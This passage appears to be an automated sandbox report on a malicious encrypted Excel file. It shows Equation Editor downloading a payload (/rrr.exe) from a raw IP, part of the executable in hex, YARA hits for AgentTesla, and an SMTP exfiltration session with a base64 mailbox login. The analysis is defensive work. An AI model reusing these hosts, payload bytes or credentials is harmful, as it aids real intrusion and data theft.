                                                                        Flash Objects Count:
                                                                        Contains VBA Macros:False

                                                                        Streams

                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                        General
                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                        File Type:data
                                                                        Stream Size:64
                                                                        Entropy:2.73637206947
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                        General
                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                        File Type:data
                                                                        Stream Size:112
                                                                        Entropy:2.7597816111
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                        General
                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                        File Type:data
                                                                        Stream Size:200
                                                                        Entropy:3.13335930328
                                                                        Base64 Encoded:False
                                                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                        General
                                                                        Stream Path:\x6DataSpaces/Version
                                                                        File Type:data
                                                                        Stream Size:76
                                                                        Entropy:2.79079600998
                                                                        Base64 Encoded:False
                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 372360
                                                                        General
                                                                        Stream Path:EncryptedPackage
                                                                        File Type:data
                                                                        Stream Size:372360
                                                                        Entropy:7.99934422624
                                                                        Base64 Encoded:True
                                                                        Data ASCII:} . . . . . . . . B z J 6 . . . . . . n . . . . . n s . F q . . p 3 . O B 7 . . G . . . R G p . . * . . . j . . . . . ( 6 . p o I . . . . L y . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . . . | . & . . . . . r . . . ' . .
                                                                        Data Raw:7d ae 05 00 00 00 00 00 c2 42 7a 4a 36 9f d2 19 ca ce 88 6e ca 03 1e 01 e5 6e 73 00 46 71 db de 70 33 88 4f 42 37 e3 e3 47 f2 e2 fc 52 47 70 d9 9b 2a db 10 df 6a e6 c3 1a bd eb 28 36 c3 70 6f 49 0c db b7 a6 4c 79 1a 81 72 0e f6 af 27 bd c6 1b 7c d0 26 85 8f c2 8c 81 72 0e f6 af 27 bd c6 1b 7c d0 26 85 8f c2 8c 81 72 0e f6 af 27 bd c6 1b 7c d0 26 85 8f c2 8c 81 72 0e f6 af 27 bd c6
                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                        General
                                                                        Stream Path:EncryptionInfo
                                                                        File Type:data
                                                                        Stream Size:224
                                                                        Entropy:4.49739252472
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . H S . . > . . . . . . . . { 5 F . | e . . . . + q . . . . . . . . + % s . . . . C ? . k . . . , B L . . . 3 f . . . . . F 3 i J
                                                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        04/12/21-11:36:32.655479TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49166587192.168.2.22208.91.199.225

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 12, 2021 11:34:49.508043051 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:49.644728899 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.644813061 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:49.645109892 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:49.782322884 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.782351017 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.782362938 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.782378912 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.782480001 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:49.917784929 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917829990 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917850971 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917876959 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917897940 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917920113 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917943001 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917967081 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:49.917989016 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:49.918010950 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:49.918013096 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053291082 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053330898 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053347111 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053368092 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053402901 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053426027 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053452969 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053479910 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053508043 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053529978 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053545952 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053551912 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053575039 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053581953 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053586960 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053591013 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053594112 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053597927 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053601980 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053618908 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053627968 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053648949 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053651094 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053659916 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053674936 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.053702116 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.053709984 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.055596113 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.188965082 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.188994884 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189009905 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189026117 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189042091 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189050913 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189058065 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189071894 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189074993 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189074993 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189090014 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189094067 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189102888 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189111948 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189127922 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189145088 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189151049 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189161062 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189165115 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189177036 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189177990 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189191103 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189193010 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189207077 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189209938 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189222097 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189229965 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189237118 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189246893 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189259052 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189263105 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189274073 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189280033 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189290047 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189296007 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189306021 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189311028 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189327002 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189327002 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189337969 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189342022 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189352989 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189361095 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189378023 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189403057 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189408064 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189409971 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189429045 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189445019 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189461946 CEST8049165198.23.213.61192.168.2.22
                                                                        Apr 12, 2021 11:34:50.189465046 CEST4916580192.168.2.22198.23.213.61
                                                                        Apr 12, 2021 11:34:50.189476967 CEST8049165198.23.213.61192.168.2.22

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 12, 2021 11:36:30.752711058 CEST5219753192.168.2.228.8.8.8
                                                                        Apr 12, 2021 11:36:30.814750910 CEST53521978.8.8.8192.168.2.22

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 12, 2021 11:36:30.752711058 CEST192.168.2.228.8.8.80xb781Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 12, 2021 11:36:30.814750910 CEST8.8.8.8192.168.2.220xb781No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                        Apr 12, 2021 11:36:30.814750910 CEST8.8.8.8192.168.2.220xb781No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                        Apr 12, 2021 11:36:30.814750910 CEST8.8.8.8192.168.2.220xb781No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                        Apr 12, 2021 11:36:30.814750910 CEST8.8.8.8192.168.2.220xb781No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • 198.23.213.61

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.2249165198.23.213.6180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 12, 2021 11:34:49.645109892 CEST0OUTGET /rrr.exe HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: 198.23.213.61
                                                                        Connection: Keep-Alive
                                                                        Apr 12, 2021 11:34:49.782322884 CEST1INHTTP/1.1 200 OK
                                                                        Date: Mon, 12 Apr 2021 09:34:49 GMT
                                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                        Last-Modified: Mon, 12 Apr 2021 08:37:15 GMT
                                                                        ETag: "ddc00-5bfc26bb7fa1d"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 908288
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-msdownload
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 06 74 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 bc 0c 00 00 1e 01 00 00 00 00 00 fe da 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 da 0c 00 4b 00 00 00 00 e0 0c 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 bb 0c 00 00 20 00 00 00 bc 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 1c 01 00 00 e0 0c 00 00 1c 01 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 da 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 da 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ed 0b 00 14 ed 00 00 03 00 00 00 01 00 00 06 f8 13 02 00 98 d9 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 23 01 00 00 01 00 00 11 2b 02 26 16 00 38 0a 01 00 00 02 16 38 e8 00 00 00 00 2b 3a 06 1f 63 61 0a 2b 1e 07 1f 6a 61 0b 07 1f 6f 58 45 04 00 00 00 0a 00 00 00 15 00 00 00 27 00 00 00 5d 00 00 00 1f 5d 28 9d 01 00 06 0b 2b d8 d0 01 00 00 06 26 1f fb 0b 2b cd 1f 62 28 9d 01 00 06 0a 1f 64 28 dc 01 00 06 0b 2b bb 06 1f 5c 58 45 0a 00 00 00 0a 00 00 00 13 00 00 00 21 00 00 00 2a 00 00 00 39 00 00 00 48 00 00 00 56 00 00 00 5f 00 00 00 7a 00 00 00 91 00 00 00 1f f8 0b 2b 85 38 79 ff ff ff 00 1f ce 0a 38 70 ff ff ff 00 1f 6a 28 9d 01 00 06 0a 38 62 ff ff ff 00 1f c4 0a 38 59 ff ff ff 02 17 28 07 00 00 0a 1f c9 0a 38 4a ff ff ff 02 17 28 08 00 00 0a 1f c6 0a 38 3b ff ff ff d0 03 00 00 06 26 1f ca 0a 38 2d ff ff ff 00 1f cb 0a 38 24 ff ff ff 02 16 28 09 00 00 0a 2b 0a 28 0a 00 00 0a 38 0e ff ff ff 1f c7 0a 38 09 ff ff ff 02 16 28 0b 00 00 0a 2b 06 00 38 f0 fe ff ff 1f c5 0a 38 f2 fe ff ff 2a 00 13 30 02 00 9d 00 00 00 01 00 00 11 2b 02 26 16 00 00 2b 41 06 1f 71 61 0a 2b 0f 07 1f 6a 61 38 70 00 00 00 07 1f 6b 59 2b 3c 1c 0b 2b ed d0 01
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt`P @ @K H.text `.rsrc@@.reloc@BH0#+&(((o*0#+&88+:ca+jaoXE']](+&+b(d(+\XE!*9HV_z+8y8pj(8b8Y(8J(8;&8-8$(+(88(+88*0+&+Aqa+ja8pkY+<+


                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        Apr 12, 2021 11:36:31.577835083 CEST58749166208.91.199.225192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                        Apr 12, 2021 11:36:31.578409910 CEST49166587192.168.2.22208.91.199.225EHLO 936905
                                                                        Apr 12, 2021 11:36:31.752908945 CEST58749166208.91.199.225192.168.2.22250-us2.outbound.mailhostbox.com
                                                                        250-PIPELINING
                                                                        250-SIZE 41648128
                                                                        250-VRFY
                                                                        250-ETRN
                                                                        250-STARTTLS
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-AUTH=PLAIN LOGIN
                                                                        250-ENHANCEDSTATUSCODES
                                                                        250-8BITMIME
                                                                        250 DSN
                                                                        Apr 12, 2021 11:36:31.755284071 CEST49166587192.168.2.22208.91.199.225AUTH login cmF6aWxvZ3NAcmF6aWxvZ3MuY29t
                                                                        Apr 12, 2021 11:36:31.930722952 CEST58749166208.91.199.225192.168.2.22334 UGFzc3dvcmQ6
                                                                        Apr 12, 2021 11:36:32.109057903 CEST58749166208.91.199.225192.168.2.22235 2.7.0 Authentication successful
                                                                        Apr 12, 2021 11:36:32.110141993 CEST49166587192.168.2.22208.91.199.225MAIL FROM:<razilogs@razilogs.com>
                                                                        Apr 12, 2021 11:36:32.285648108 CEST58749166208.91.199.225192.168.2.22250 2.1.0 Ok
                                                                        Apr 12, 2021 11:36:32.286338091 CEST49166587192.168.2.22208.91.199.225RCPT TO:<razilogs@razilogs.com>
                                                                        Apr 12, 2021 11:36:32.477194071 CEST58749166208.91.199.225192.168.2.22250 2.1.5 Ok
                                                                        Apr 12, 2021 11:36:32.477833033 CEST49166587192.168.2.22208.91.199.225DATA
                                                                        Apr 12, 2021 11:36:32.652573109 CEST58749166208.91.199.225192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                        Apr 12, 2021 11:36:32.656296015 CEST49166587192.168.2.22208.91.199.225.
                                                                        Apr 12, 2021 11:36:32.929917097 CEST58749166208.91.199.225192.168.2.22250 2.0.0 Ok: queued as 6229B7824B7

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:11:34:34
                                                                        Start date:12/04/2021
                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                        Imagebase:0x13fe30000
                                                                        File size:27641504 bytes
                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:11:34:56
                                                                        Start date:12/04/2021
                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                        Imagebase:0x400000
                                                                        File size:543304 bytes
                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:11:34:59
                                                                        Start date:12/04/2021
                                                                        Path:C:\Users\Public\vbc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                        Imagebase:0xf60000
                                                                        File size:908288 bytes
                                                                        MD5 hash:ABEB7AA739C4F99C996B91E51A1FA885
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low

                                                                        General

                                                                        Start time:11:35:08
                                                                        Start date:12/04/2021
                                                                        Path:C:\Users\Public\vbc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\Public\vbc.exe
                                                                        Imagebase:0xf60000
                                                                        File size:908288 bytes
                                                                        MD5 hash:ABEB7AA739C4F99C996B91E51A1FA885
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >